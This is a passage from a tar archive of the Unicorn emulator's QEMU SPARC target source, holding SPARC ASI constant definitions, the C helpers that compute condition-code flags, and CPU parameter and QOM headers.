0x0F /* Data Cache Data; rw, ss */ /* The following cache flushing ASIs work only with the 'sta' * instruction. Results are unpredictable for 'swap' and 'ldstuba', * so don't do it. */ /* These ASI flushes affect external caches too. */ #define ASI_M_FLUSH_PAGE 0x10 /* Flush I&D Cache Line (page); wo, ss */ #define ASI_M_FLUSH_SEG 0x11 /* Flush I&D Cache Line (seg); wo, ss */ #define ASI_M_FLUSH_REGION 0x12 /* Flush I&D Cache Line (region); wo, ss */ #define ASI_M_FLUSH_CTX 0x13 /* Flush I&D Cache Line (context); wo, ss */ #define ASI_M_FLUSH_USER 0x14 /* Flush I&D Cache Line (user); wo, ss */ /* Block-copy operations are available only on certain V8 cpus. */ #define ASI_M_BCOPY 0x17 /* Block copy */ /* These affect only the ICACHE and are Ross HyperSparc and TurboSparc specific. */ #define ASI_M_IFLUSH_PAGE 0x18 /* Flush I Cache Line (page); wo, ss */ #define ASI_M_IFLUSH_SEG 0x19 /* Flush I Cache Line (seg); wo, ss */ #define ASI_M_IFLUSH_REGION 0x1A /* Flush I Cache Line (region); wo, ss */ #define ASI_M_IFLUSH_CTX 0x1B /* Flush I Cache Line (context); wo, ss */ #define ASI_M_IFLUSH_USER 0x1C /* Flush I Cache Line (user); wo, ss */ /* Block-fill operations are available on certain V8 cpus */ #define ASI_M_BFILL 0x1F /* This allows direct access to main memory, actually 0x20 to 0x2f are * the available ASI's for physical ram pass-through, but I don't have * any idea what the other ones do.... */ #define ASI_M_BYPASS 0x20 /* Reference MMU bypass; rw, as */ #define ASI_M_FBMEM 0x29 /* Graphics card frame buffer access */ #define ASI_M_VMEUS 0x2A /* VME user 16-bit access */ #define ASI_M_VMEPS 0x2B /* VME priv 16-bit access */ #define ASI_M_VMEUT 0x2C /* VME user 32-bit access */ #define ASI_M_VMEPT 0x2D /* VME priv 32-bit access */ #define ASI_M_SBUS 0x2E /* Direct SBus access */ #define ASI_M_CTL 0x2F /* Control Space (ECC and MXCC are here) */ /* This is ROSS HyperSparc only. */ #define ASI_M_FLUSH_IWHOLE 0x31 /* Flush entire ICACHE; wo, ss */ /* Tsunami/Viking/TurboSparc i/d cache flash clear. */ #define ASI_M_IC_FLCLEAR 0x36 #define ASI_M_DC_FLCLEAR 0x37 #define ASI_M_DCDR 0x39 /* Data Cache Diagnostics Register rw, ss */ #define ASI_M_VIKING_TMP1 0x40 /* Emulation temporary 1 on Viking */ /* only available on SuperSparc I */ /* #define ASI_M_VIKING_TMP2 0x41 */ /* Emulation temporary 2 on Viking */ #define ASI_M_ACTION 0x4c /* Breakpoint Action Register (GNU/Viking) */ /* LEON ASI */ #define ASI_LEON_NOCACHE 0x01 #define ASI_LEON_DCACHE_MISS 0x01 #define ASI_LEON_CACHEREGS 0x02 #define ASI_LEON_IFLUSH 0x10 #define ASI_LEON_DFLUSH 0x11 #define ASI_LEON_MMUFLUSH 0x18 #define ASI_LEON_MMUREGS 0x19 #define ASI_LEON_BYPASS 0x1c #define ASI_LEON_FLUSH_PAGE 0x10 /* V9 Architecture mandary ASIs. */ #define ASI_N 0x04 /* Nucleus */ #define ASI_NL 0x0c /* Nucleus, little endian */ #define ASI_AIUP 0x10 /* Primary, user */ #define ASI_AIUS 0x11 /* Secondary, user */ #define ASI_AIUPL 0x18 /* Primary, user, little endian */ #define ASI_AIUSL 0x19 /* Secondary, user, little endian */ #define ASI_P 0x80 /* Primary, implicit */ #define ASI_S 0x81 /* Secondary, implicit */ #define ASI_PNF 0x82 /* Primary, no fault */ #define ASI_SNF 0x83 /* Secondary, no fault */ #define ASI_PL 0x88 /* Primary, implicit, l-endian */ #define ASI_SL 0x89 /* Secondary, implicit, l-endian */ #define ASI_PNFL 0x8a /* Primary, no fault, l-endian */ #define ASI_SNFL 0x8b /* Secondary, no fault, l-endian */ /* SpitFire and later extended ASIs. The "(III)" marker designates * UltraSparc-III and later specific ASIs. The "(CMT)" marker designates * Chip Multi Threading specific ASIs. "(NG)" designates Niagara specific * ASIs, "(4V)" designates SUN4V specific ASIs. "(NG4)" designates SPARC-T4 * and later ASIs. */ #define ASI_REAL 0x14 /* Real address, cachable */ #define ASI_PHYS_USE_EC 0x14 /* PADDR, E-cachable */ #define ASI_REAL_IO 0x15 /* Real address, non-cachable */ #define ASI_PHYS_BYPASS_EC_E 0x15 /* PADDR, E-bit */ #define ASI_BLK_AIUP_4V 0x16 /* (4V) Prim, user, block ld/st */ #define ASI_BLK_AIUS_4V 0x17 /* (4V) Sec, user, block ld/st */ #define ASI_REAL_L 0x1c /* Real address, cachable, LE */ #define ASI_PHYS_USE_EC_L 0x1c /* PADDR, E-cachable, little endian*/ #define ASI_REAL_IO_L 0x1d /* Real address, non-cachable, LE */ #define ASI_PHYS_BYPASS_EC_E_L 0x1d /* PADDR, E-bit, little endian */ #define ASI_BLK_AIUP_L_4V 0x1e /* (4V) Prim, user, block, l-endian*/ #define ASI_BLK_AIUS_L_4V 0x1f /* (4V) Sec, user, block, l-endian */ #define ASI_SCRATCHPAD 0x20 /* (4V) Scratch Pad Registers */ #define ASI_MMU 0x21 /* (4V) MMU Context Registers */ #define ASI_TWINX_AIUP 0x22 /* twin load, primary user */ #define ASI_TWINX_AIUS 0x23 /* twin load, secondary user */ #define ASI_BLK_INIT_QUAD_LDD_AIUS 0x23 /* (NG) init-store, twin load, * secondary, user */ #define ASI_NUCLEUS_QUAD_LDD 0x24 /* Cachable, qword load */ #define ASI_QUEUE 0x25 /* (4V) Interrupt Queue Registers */ #define ASI_TWINX_REAL 0x26 /* twin load, real, cachable */ #define ASI_QUAD_LDD_PHYS_4V 0x26 /* (4V) Physical, qword load */ #define ASI_TWINX_N 0x27 /* twin load, nucleus */ #define ASI_TWINX_AIUP_L 0x2a /* twin load, primary user, LE */ #define ASI_TWINX_AIUS_L 0x2b /* twin load, secondary user, LE */ #define ASI_NUCLEUS_QUAD_LDD_L 0x2c /* Cachable, qword load, l-endian */ #define ASI_TWINX_REAL_L 0x2e /* twin load, real, cachable, LE */ #define ASI_QUAD_LDD_PHYS_L_4V 0x2e /* (4V) Phys, qword load, l-endian */ #define ASI_TWINX_NL 0x2f /* twin load, nucleus, LE */ #define ASI_PCACHE_DATA_STATUS 0x30 /* (III) PCache data stat RAM diag */ #define ASI_PCACHE_DATA 0x31 /* (III) PCache data RAM diag */ #define ASI_PCACHE_TAG 0x32 /* (III) PCache tag RAM diag */ #define ASI_PCACHE_SNOOP_TAG 0x33 /* (III) PCache snoop tag RAM diag */ #define ASI_QUAD_LDD_PHYS 0x34 /* (III+) PADDR, qword load */ #define ASI_WCACHE_VALID_BITS 0x38 /* (III) WCache Valid Bits diag */ #define ASI_WCACHE_DATA 0x39 /* (III) WCache data RAM diag */ #define ASI_WCACHE_TAG 0x3a /* (III) WCache tag RAM diag */ #define ASI_WCACHE_SNOOP_TAG 0x3b /* (III) WCache snoop tag RAM diag */ #define ASI_QUAD_LDD_PHYS_L 0x3c /* (III+) PADDR, qw-load, l-endian */ #define ASI_SRAM_FAST_INIT 0x40 /* (III+) Fast SRAM init */ #define ASI_CORE_AVAILABLE 0x41 /* (CMT) LP Available */ #define ASI_CORE_ENABLE_STAT 0x41 /* (CMT) LP Enable Status */ #define ASI_CORE_ENABLE 0x41 /* (CMT) LP Enable RW */ #define ASI_XIR_STEERING 0x41 /* (CMT) XIR Steering RW */ #define ASI_CORE_RUNNING_RW 0x41 /* (CMT) LP Running RW */ #define ASI_CORE_RUNNING_W1S 0x41 /* (CMT) LP Running Write-One Set */ #define ASI_CORE_RUNNING_W1C 0x41 /* (CMT) LP Running Write-One Clr */ #define ASI_CORE_RUNNING_STAT 0x41 /* (CMT) LP Running Status */ #define ASI_CMT_ERROR_STEERING 0x41 /* (CMT) Error Steering RW */ #define ASI_DCACHE_INVALIDATE 0x42 /* (III) DCache Invalidate diag */ #define ASI_DCACHE_UTAG 0x43 /* (III) DCache uTag diag */ #define ASI_DCACHE_SNOOP_TAG 0x44 /* (III) DCache snoop tag RAM diag */ #define ASI_LSU_CONTROL 0x45 /* Load-store control unit */ #define ASI_DCU_CONTROL_REG 0x45 /* (III) DCache Unit Control reg */ #define ASI_DCACHE_DATA 0x46 /* DCache data-ram diag access */ #define ASI_DCACHE_TAG 0x47 /* Dcache tag/valid ram diag access*/ #define ASI_INTR_DISPATCH_STAT 0x48 /* IRQ vector dispatch status */ #define ASI_INTR_RECEIVE 0x49 /* IRQ vector receive status */ #define ASI_UPA_CONFIG 0x4a /* UPA config space */ #define ASI_JBUS_CONFIG 0x4a /* (IIIi) JBUS Config Register */ #define ASI_SAFARI_CONFIG 0x4a /* (III) Safari Config Register */ #define ASI_SAFARI_ADDRESS 0x4a /* (III) Safari Address Register */ #define ASI_ESTATE_ERROR_EN 0x4b /* E-cache error enable space */ #define ASI_AFSR 0x4c /* Async fault status register */ #define ASI_AFAR 0x4d /* Async fault address register */ #define ASI_EC_TAG_DATA 0x4e /* E-cache tag/valid ram diag acc */ #define ASI_HYP_SCRATCHPAD 0x4f /* (4V) Hypervisor scratchpad */ #define ASI_IMMU 0x50 /* Insn-MMU main register space */ #define ASI_IMMU_TSB_8KB_PTR 0x51 /* Insn-MMU 8KB TSB pointer reg */ #define ASI_IMMU_TSB_64KB_PTR 0x52 /* Insn-MMU 64KB TSB pointer reg */ #define ASI_ITLB_DATA_IN 0x54 /* Insn-MMU TLB data in reg */ #define ASI_ITLB_DATA_ACCESS 0x55 /* Insn-MMU TLB data access reg */ #define ASI_ITLB_TAG_READ 0x56 /* Insn-MMU TLB tag read reg */ #define ASI_IMMU_DEMAP 0x57 /* Insn-MMU TLB demap */ #define ASI_DMMU 0x58 /* Data-MMU main register space */ #define ASI_DMMU_TSB_8KB_PTR 0x59 /* Data-MMU 8KB TSB pointer reg */ #define ASI_DMMU_TSB_64KB_PTR 0x5a /* Data-MMU 16KB TSB pointer reg */ #define ASI_DMMU_TSB_DIRECT_PTR 0x5b /* Data-MMU TSB direct pointer reg */ #define ASI_DTLB_DATA_IN 0x5c /* Data-MMU TLB data in reg */ #define ASI_DTLB_DATA_ACCESS 0x5d /* Data-MMU TLB data access reg */ #define ASI_DTLB_TAG_READ 0x5e /* Data-MMU TLB tag read reg */ #define ASI_DMMU_DEMAP 0x5f /* Data-MMU TLB demap */ #define ASI_IIU_INST_TRAP 0x60 /* (III) Instruction Breakpoint */ #define ASI_INTR_ID 0x63 /* (CMT) Interrupt ID register */ #define ASI_CORE_ID 0x63 /* (CMT) LP ID register */ #define ASI_CESR_ID 0x63 /* (CMT) CESR ID register */ #define ASI_IC_INSTR 0x66 /* Insn cache instrucion ram diag */ #define ASI_IC_TAG 0x67 /* Insn cache tag/valid ram diag */ #define ASI_IC_STAG 0x68 /* (III) Insn cache snoop tag ram */ #define ASI_IC_PRE_DECODE 0x6e /* Insn cache pre-decode ram diag */ #define ASI_IC_NEXT_FIELD 0x6f /* Insn cache next-field ram diag */ #define ASI_BRPRED_ARRAY 0x6f /* (III) Branch Prediction RAM diag*/ #define ASI_BLK_AIUP 0x70 /* Primary, user, block load/store */ #define ASI_BLK_AIUS 0x71 /* Secondary, user, block ld/st */ #define ASI_MCU_CTRL_REG 0x72 /* (III) Memory controller regs */ #define ASI_EC_DATA 0x74 /* (III) E-cache data staging reg */ #define ASI_EC_CTRL 0x75 /* (III) E-cache control reg */ #define ASI_EC_W 0x76 /* E-cache diag write access */ #define ASI_UDB_ERROR_W 0x77 /* External UDB error regs W */ #define ASI_UDB_CONTROL_W 0x77 /* External UDB control regs W */ #define ASI_INTR_W 0x77 /* IRQ vector dispatch write */ #define ASI_INTR_DATAN_W 0x77 /* (III) Out irq vector data reg N */ #define ASI_INTR_DISPATCH_W 0x77 /* (III) Interrupt vector dispatch */ #define ASI_BLK_AIUPL 0x78 /* Primary, user, little, blk ld/st*/ #define ASI_BLK_AIUSL 0x79 /* Secondary, user, little, blk ld/st*/ #define ASI_EC_R 0x7e /* E-cache diag read access */ #define ASI_UDBH_ERROR_R 0x7f /* External UDB error regs rd hi */ #define ASI_UDBL_ERROR_R 0x7f /* External UDB error regs rd low */ #define ASI_UDBH_CONTROL_R 0x7f /* External UDB control regs rd hi */ #define ASI_UDBL_CONTROL_R 0x7f /* External UDB control regs rd low*/ #define ASI_INTR_R 0x7f /* IRQ vector dispatch read */ #define ASI_INTR_DATAN_R 0x7f /* (III) In irq vector data reg N */ #define ASI_PIC 0xb0 /* (NG4) PIC registers */ #define ASI_PST8_P 0xc0 /* Primary, 8 8-bit, partial */ #define ASI_PST8_S 0xc1 /* Secondary, 8 8-bit, partial */ #define ASI_PST16_P 0xc2 /* Primary, 4 16-bit, partial */ #define ASI_PST16_S 0xc3 /* Secondary, 4 16-bit, partial */ #define ASI_PST32_P 0xc4 /* Primary, 2 32-bit, partial */ #define ASI_PST32_S 0xc5 /* Secondary, 2 32-bit, partial */ #define ASI_PST8_PL 0xc8 /* Primary, 8 8-bit, partial, L */ #define ASI_PST8_SL 0xc9 /* Secondary, 8 8-bit, partial, L */ #define ASI_PST16_PL 0xca /* Primary, 4 16-bit, partial, L */ #define ASI_PST16_SL 0xcb /* Secondary, 4 16-bit, partial, L */ #define ASI_PST32_PL 0xcc /* Primary, 2 32-bit, partial, L */ #define ASI_PST32_SL 0xcd /* Secondary, 2 32-bit, partial, L */ #define ASI_FL8_P 0xd0 /* Primary, 1 8-bit, fpu ld/st */ #define ASI_FL8_S 0xd1 /* Secondary, 1 8-bit, fpu ld/st */ #define ASI_FL16_P 0xd2 /* Primary, 1 16-bit, fpu ld/st */ #define ASI_FL16_S 0xd3 /* Secondary, 1 16-bit, fpu ld/st */ #define ASI_FL8_PL 0xd8 /* Primary, 1 8-bit, fpu ld/st, L */ #define ASI_FL8_SL 0xd9 /* Secondary, 1 8-bit, fpu ld/st, L*/ #define ASI_FL16_PL 0xda /* Primary, 1 16-bit, fpu ld/st, L */ #define ASI_FL16_SL 0xdb /* Secondary, 1 16-bit, fpu ld/st,L*/ #define ASI_BLK_COMMIT_P 0xe0 /* Primary, blk store commit */ #define ASI_BLK_COMMIT_S 0xe1 /* Secondary, blk store commit */ #define ASI_TWINX_P 0xe2 /* twin load, primary implicit */ #define ASI_BLK_INIT_QUAD_LDD_P 0xe2 /* (NG) init-store, twin load, * primary, implicit */ #define ASI_TWINX_S 0xe3 /* twin load, secondary implicit */ #define ASI_BLK_INIT_QUAD_LDD_S 0xe3 /* (NG) init-store, twin load, * secondary, implicit */ #define ASI_TWINX_PL 0xea /* twin load, primary implicit, LE */ #define ASI_TWINX_SL 0xeb /* twin load, secondary implicit, LE */ #define ASI_BLK_P 0xf0 /* Primary, blk ld/st */ #define ASI_BLK_S 0xf1 /* Secondary, blk ld/st */ #define ASI_ST_BLKINIT_MRU_P 0xf2 /* (NG4) init-store, twin load, * Most-Recently-Used, primary, * implicit */ #define ASI_ST_BLKINIT_MRU_S 0xf2 /* (NG4) init-store, twin load, * Most-Recently-Used, secondary, * implicit */ #define ASI_BLK_PL 0xf8 /* Primary, blk ld/st, little */ #define ASI_BLK_SL 0xf9 /* Secondary, blk ld/st, little */ #define ASI_ST_BLKINIT_MRU_PL 0xfa /* (NG4) init-store, twin load, * Most-Recently-Used, primary, * implicit, little-endian */ #define ASI_ST_BLKINIT_MRU_SL 0xfb /* (NG4) init-store, twin load, * Most-Recently-Used, secondary, * implicit, little-endian */ #endif /* SPARC_ASI_H */ ��������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/sparc/cc_helper.c���������������������������������������������������������0000664�0000000�0000000�00000025265�14675241067�0020653�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Helpers for lazy condition code handling * * Copyright (c) 2003-2005 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" static uint32_t compute_all_flags(CPUSPARCState *env) { return env->psr & PSR_ICC; } static uint32_t compute_C_flags(CPUSPARCState *env) { return env->psr & PSR_CARRY; } static inline uint32_t get_NZ_icc(int32_t dst) { uint32_t ret = 0; if (dst == 0) { ret = PSR_ZERO; } else if (dst < 0) { ret = PSR_NEG; } return ret; } #ifdef TARGET_SPARC64 static uint32_t compute_all_flags_xcc(CPUSPARCState *env) { return env->xcc & PSR_ICC; } static uint32_t compute_C_flags_xcc(CPUSPARCState *env) { return env->xcc & PSR_CARRY; } static inline uint32_t get_NZ_xcc(target_long dst) { uint32_t ret = 0; if (!dst) { ret = PSR_ZERO; } else if (dst < 0) { ret = PSR_NEG; } return ret; } #endif static inline uint32_t get_V_div_icc(target_ulong src2) { uint32_t ret = 0; if (src2 != 0) { ret = PSR_OVF; } return ret; } static uint32_t compute_all_div(CPUSPARCState *env) { uint32_t ret; ret = get_NZ_icc(CC_DST); ret |= get_V_div_icc(CC_SRC2); return ret; } static uint32_t compute_C_div(CPUSPARCState *env) { return 0; } static inline uint32_t get_C_add_icc(uint32_t dst, uint32_t src1) { uint32_t ret = 0; if (dst < src1) { ret = PSR_CARRY; } return ret; } static inline uint32_t get_C_addx_icc(uint32_t dst, uint32_t src1, uint32_t src2) { uint32_t ret = 0; if (((src1 & src2) | (~dst & (src1 | src2))) & (1U << 31)) { ret = PSR_CARRY; } return ret; } static inline uint32_t get_V_add_icc(uint32_t dst, uint32_t src1, uint32_t src2) { uint32_t ret = 0; if (((src1 ^ src2 ^ -1) & (src1 ^ dst)) & (1U << 31)) { ret = PSR_OVF; } return ret; } #ifdef TARGET_SPARC64 static inline uint32_t get_C_add_xcc(target_ulong dst, target_ulong src1) { uint32_t ret = 0; if (dst < src1) { ret = PSR_CARRY; } return ret; } static inline uint32_t get_C_addx_xcc(target_ulong dst, target_ulong src1, target_ulong src2) { uint32_t ret = 0; if (((src1 & src2) | (~dst & (src1 | src2))) & (1ULL << 63)) { ret = PSR_CARRY; } return ret; } static inline uint32_t get_V_add_xcc(target_ulong dst, target_ulong src1, target_ulong src2) { uint32_t ret = 0; if (((src1 ^ src2 ^ -1) & (src1 ^ dst)) & (1ULL << 63)) { ret = PSR_OVF; } return ret; } static uint32_t compute_all_add_xcc(CPUSPARCState *env) { uint32_t ret; ret = get_NZ_xcc(CC_DST); ret |= get_C_add_xcc(CC_DST, CC_SRC); ret |= get_V_add_xcc(CC_DST, CC_SRC, CC_SRC2); return ret; } static uint32_t compute_C_add_xcc(CPUSPARCState *env) { return get_C_add_xcc(CC_DST, CC_SRC); } #endif static uint32_t compute_all_add(CPUSPARCState *env) { uint32_t ret; ret = get_NZ_icc(CC_DST); ret |= get_C_add_icc(CC_DST, CC_SRC); ret |= get_V_add_icc(CC_DST, CC_SRC, CC_SRC2); return ret; } static uint32_t compute_C_add(CPUSPARCState *env) { return get_C_add_icc(CC_DST, CC_SRC); } #ifdef TARGET_SPARC64 static uint32_t compute_all_addx_xcc(CPUSPARCState *env) { uint32_t ret; ret = get_NZ_xcc(CC_DST); ret |= get_C_addx_xcc(CC_DST, CC_SRC, CC_SRC2); ret |= get_V_add_xcc(CC_DST, CC_SRC, CC_SRC2); return ret; } static uint32_t compute_C_addx_xcc(CPUSPARCState *env) { return get_C_addx_xcc(CC_DST, CC_SRC, CC_SRC2); } #endif static uint32_t compute_all_addx(CPUSPARCState *env) { uint32_t ret; ret = get_NZ_icc(CC_DST); ret |= get_C_addx_icc(CC_DST, CC_SRC, CC_SRC2); ret |= get_V_add_icc(CC_DST, CC_SRC, CC_SRC2); return ret; } static uint32_t compute_C_addx(CPUSPARCState *env) { return get_C_addx_icc(CC_DST, CC_SRC, CC_SRC2); } static inline uint32_t get_V_tag_icc(target_ulong src1, target_ulong src2) { uint32_t ret = 0; if ((src1 | src2) & 0x3) { ret = PSR_OVF; } return ret; } static uint32_t compute_all_tadd(CPUSPARCState *env) { uint32_t ret; ret = get_NZ_icc(CC_DST); ret |= get_C_add_icc(CC_DST, CC_SRC); ret |= get_V_add_icc(CC_DST, CC_SRC, CC_SRC2); ret |= get_V_tag_icc(CC_SRC, CC_SRC2); return ret; } static uint32_t compute_all_taddtv(CPUSPARCState *env) { uint32_t ret; ret = get_NZ_icc(CC_DST); ret |= get_C_add_icc(CC_DST, CC_SRC); return ret; } static inline uint32_t get_C_sub_icc(uint32_t src1, uint32_t src2) { uint32_t ret = 0; if (src1 < src2) { ret = PSR_CARRY; } return ret; } static inline uint32_t get_C_subx_icc(uint32_t dst, uint32_t src1, uint32_t src2) { uint32_t ret = 0; if (((~src1 & src2) | (dst & (~src1 | src2))) & (1U << 31)) { ret = PSR_CARRY; } return ret; } static inline uint32_t get_V_sub_icc(uint32_t dst, uint32_t src1, uint32_t src2) { uint32_t ret = 0; if (((src1 ^ src2) & (src1 ^ dst)) & (1U << 31)) { ret = PSR_OVF; } return ret; } #ifdef TARGET_SPARC64 static inline uint32_t get_C_sub_xcc(target_ulong src1, target_ulong src2) { uint32_t ret = 0; if (src1 < src2) { ret = PSR_CARRY; } return ret; } static inline uint32_t get_C_subx_xcc(target_ulong dst, target_ulong src1, target_ulong src2) { uint32_t ret = 0; if (((~src1 & src2) | (dst & (~src1 | src2))) & (1ULL << 63)) { ret = PSR_CARRY; } return ret; } static inline uint32_t get_V_sub_xcc(target_ulong dst, target_ulong src1, target_ulong src2) { uint32_t ret = 0; if (((src1 ^ src2) & (src1 ^ dst)) & (1ULL << 63)) { ret = PSR_OVF; } return ret; } static uint32_t compute_all_sub_xcc(CPUSPARCState *env) { uint32_t ret; ret = get_NZ_xcc(CC_DST); ret |= get_C_sub_xcc(CC_SRC, CC_SRC2); ret |= get_V_sub_xcc(CC_DST, CC_SRC, CC_SRC2); return ret; } static uint32_t compute_C_sub_xcc(CPUSPARCState *env) { return get_C_sub_xcc(CC_SRC, CC_SRC2); } #endif static uint32_t compute_all_sub(CPUSPARCState *env) { uint32_t ret; ret = get_NZ_icc(CC_DST); ret |= get_C_sub_icc(CC_SRC, CC_SRC2); ret |= get_V_sub_icc(CC_DST, CC_SRC, CC_SRC2); return ret; } static uint32_t compute_C_sub(CPUSPARCState *env) { return get_C_sub_icc(CC_SRC, CC_SRC2); } #ifdef TARGET_SPARC64 static uint32_t compute_all_subx_xcc(CPUSPARCState *env) { uint32_t ret; ret = get_NZ_xcc(CC_DST); ret |= get_C_subx_xcc(CC_DST, CC_SRC, CC_SRC2); ret |= get_V_sub_xcc(CC_DST, CC_SRC, CC_SRC2); return ret; } static uint32_t compute_C_subx_xcc(CPUSPARCState *env) { return get_C_subx_xcc(CC_DST, CC_SRC, CC_SRC2); } #endif static uint32_t compute_all_subx(CPUSPARCState *env) { uint32_t ret; ret = get_NZ_icc(CC_DST); ret |= get_C_subx_icc(CC_DST, CC_SRC, CC_SRC2); ret |= get_V_sub_icc(CC_DST, CC_SRC, CC_SRC2); return ret; } static uint32_t compute_C_subx(CPUSPARCState *env) { return get_C_subx_icc(CC_DST, CC_SRC, CC_SRC2); } static uint32_t compute_all_tsub(CPUSPARCState *env) { uint32_t ret; ret = get_NZ_icc(CC_DST); ret |= get_C_sub_icc(CC_SRC, CC_SRC2); ret |= get_V_sub_icc(CC_DST, CC_SRC, CC_SRC2); ret |= get_V_tag_icc(CC_SRC, CC_SRC2); return ret; } static uint32_t compute_all_tsubtv(CPUSPARCState *env) { uint32_t ret; ret = get_NZ_icc(CC_DST); ret |= get_C_sub_icc(CC_SRC, CC_SRC2); return ret; } static uint32_t compute_all_logic(CPUSPARCState *env) { return get_NZ_icc(CC_DST); } static uint32_t compute_C_logic(CPUSPARCState *env) { return 0; } #ifdef TARGET_SPARC64 static uint32_t compute_all_logic_xcc(CPUSPARCState *env) { return get_NZ_xcc(CC_DST); } #endif typedef struct CCTable { uint32_t (*compute_all)(CPUSPARCState *env); /* return all the flags */ uint32_t (*compute_c)(CPUSPARCState *env); /* return the C flag */ } CCTable; static const CCTable icc_table[CC_OP_NB] = { /* CC_OP_DYNAMIC should never happen */ [CC_OP_FLAGS] = { compute_all_flags, compute_C_flags }, [CC_OP_DIV] = { compute_all_div, compute_C_div }, [CC_OP_ADD] = { compute_all_add, compute_C_add }, [CC_OP_ADDX] = { compute_all_addx, compute_C_addx }, [CC_OP_TADD] = { compute_all_tadd, compute_C_add }, [CC_OP_TADDTV] = { compute_all_taddtv, compute_C_add }, [CC_OP_SUB] = { compute_all_sub, compute_C_sub }, [CC_OP_SUBX] = { compute_all_subx, compute_C_subx }, [CC_OP_TSUB] = { compute_all_tsub, compute_C_sub }, [CC_OP_TSUBTV] = { compute_all_tsubtv, compute_C_sub }, [CC_OP_LOGIC] = { compute_all_logic, compute_C_logic }, }; #ifdef TARGET_SPARC64 static const CCTable xcc_table[CC_OP_NB] = { /* CC_OP_DYNAMIC should never happen */ [CC_OP_FLAGS] = { compute_all_flags_xcc, compute_C_flags_xcc }, [CC_OP_DIV] = { compute_all_logic_xcc, compute_C_logic }, [CC_OP_ADD] = { compute_all_add_xcc, compute_C_add_xcc }, [CC_OP_ADDX] = { compute_all_addx_xcc, compute_C_addx_xcc }, [CC_OP_TADD] = { compute_all_add_xcc, compute_C_add_xcc }, [CC_OP_TADDTV] = { compute_all_add_xcc, compute_C_add_xcc }, [CC_OP_SUB] = { compute_all_sub_xcc, compute_C_sub_xcc }, [CC_OP_SUBX] = { compute_all_subx_xcc, compute_C_subx_xcc }, [CC_OP_TSUB] = { compute_all_sub_xcc, compute_C_sub_xcc }, [CC_OP_TSUBTV] = { compute_all_sub_xcc, compute_C_sub_xcc }, [CC_OP_LOGIC] = { compute_all_logic_xcc, compute_C_logic }, }; #endif void helper_compute_psr(CPUSPARCState *env) { uint32_t new_psr; new_psr = icc_table[CC_OP].compute_all(env); env->psr = new_psr; #ifdef TARGET_SPARC64 new_psr = xcc_table[CC_OP].compute_all(env); env->xcc = new_psr; #endif CC_OP = CC_OP_FLAGS; } uint32_t helper_compute_C_icc(CPUSPARCState *env) { return icc_table[CC_OP].compute_c(env) >> PSR_CARRY_SHIFT; } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/sparc/cpu-param.h���������������������������������������������������������0000664�0000000�0000000�00000001132�14675241067�0020604�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Sparc cpu parameters for qemu. * * SPDX-License-Identifier: LGPL-2.0+ */ #ifndef SPARC_CPU_PARAM_H #define SPARC_CPU_PARAM_H 1 #ifdef TARGET_SPARC64 # define TARGET_LONG_BITS 64 # define TARGET_PAGE_BITS 13 /* 8k */ # define TARGET_PHYS_ADDR_SPACE_BITS 41 # ifdef TARGET_ABI32 # define TARGET_VIRT_ADDR_SPACE_BITS 32 # else # define TARGET_VIRT_ADDR_SPACE_BITS 44 # endif # define NB_MMU_MODES 6 #else # define TARGET_LONG_BITS 32 # define TARGET_PAGE_BITS 12 /* 4k */ # define TARGET_PHYS_ADDR_SPACE_BITS 36 # define TARGET_VIRT_ADDR_SPACE_BITS 32 # define NB_MMU_MODES 3 #endif #endif ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/sparc/cpu-qom.h�����������������������������������������������������������0000664�0000000�0000000�00000002626�14675241067�0020311�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU SPARC CPU * * Copyright (c) 2012 SUSE LINUX Products GmbH * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see * <http://www.gnu.org/licenses/lgpl-2.1.html> */ #ifndef QEMU_SPARC_CPU_QOM_H #define QEMU_SPARC_CPU_QOM_H #include "hw/core/cpu.h" #define SPARC_CPU(obj) ((SPARCCPU *)obj) #define SPARC_CPU_CLASS(klass) ((SPARCCPUClass *)klass) #define SPARC_CPU_GET_CLASS(obj) (&((SPARCCPU *)obj)->cc) typedef struct sparc_def_t sparc_def_t; /** * SPARCCPUClass: * @parent_realize: The parent class' realize handler. * @parent_reset: The parent class' reset handler. * * A SPARC CPU model. */ typedef struct SPARCCPUClass { /*< private >*/ CPUClass parent_class; /*< public >*/ void (*parent_reset)(CPUState *cpu); const sparc_def_t *cpu_def; } SPARCCPUClass; typedef struct SPARCCPU SPARCCPU; #endif ����������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/sparc/cpu.c���������������������������������������������������������������0000664�0000000�0000000�00000041537�14675241067�0017516�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Sparc CPU init helpers * * Copyright (c) 2003-2005 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * 